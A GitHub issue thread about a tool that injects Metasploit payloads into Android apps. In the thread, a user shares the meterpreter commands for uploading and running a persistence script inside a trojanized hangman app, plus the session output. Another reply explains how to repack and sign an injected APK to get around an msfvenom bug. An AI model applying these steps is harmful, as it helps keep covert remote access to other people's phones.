-
Notifications
You must be signed in to change notification settings - Fork 2
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
session terminates when app is closed #3
Comments
I am not actively maintaining this repo.
PR are also welcome.
…On Mon, 7 Mar, 2022, 9:25 pm karpiyon, ***@***.***> wrote:
I managed to run your script, had to use apktool instead of
"./Tools/apktool.jar"
When I run the app I get a session.
I do:
cd /
cd sdcard
upload PersistanceScript.sh
shell
sh PersistanceScript.sh
CRTL +C
However, after i close the app my session dies.
meterpreter > shell
Process 1 created.
Channel 2 created.
sh ./PersistenceScript.sh
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=by.dustteam.hangman/.vkcbc.Zxdrv }
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=by.dustteam.hangman/.vkcbc.Zxdrv }
—
Reply to this email directly, view it on GitHub
<#3>, or
unsubscribe
<https://github.com/notifications/unsubscribe-auth/ALGUWV6TPFO3YF4FBNM254DU6YRHPANCNFSM5QDWNLUQ>
.
Triage notifications on the go with GitHub Mobile for iOS
<https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675>
or Android
<https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>.
You are receiving this because you are subscribed to this thread.Message
ID: ***@***.***>
|
there is a bug/fault in recent mesfvenom injection method, or perhaps this is in teh apktool. To overcome this you need to unpack the injected apk, modify it's apktool.yml, pack and sign. Do you know how to use this script when you inject a payload manually?
It only works for a "stand alone" payload but when I add it myself, without obfuscating, it does not. |
I managed to run your script, had to use apktool instead of "./Tools/apktool.jar"
When I run the app I get a session.
I do:
However, after i close the app my session dies.
The text was updated successfully, but these errors were encountered: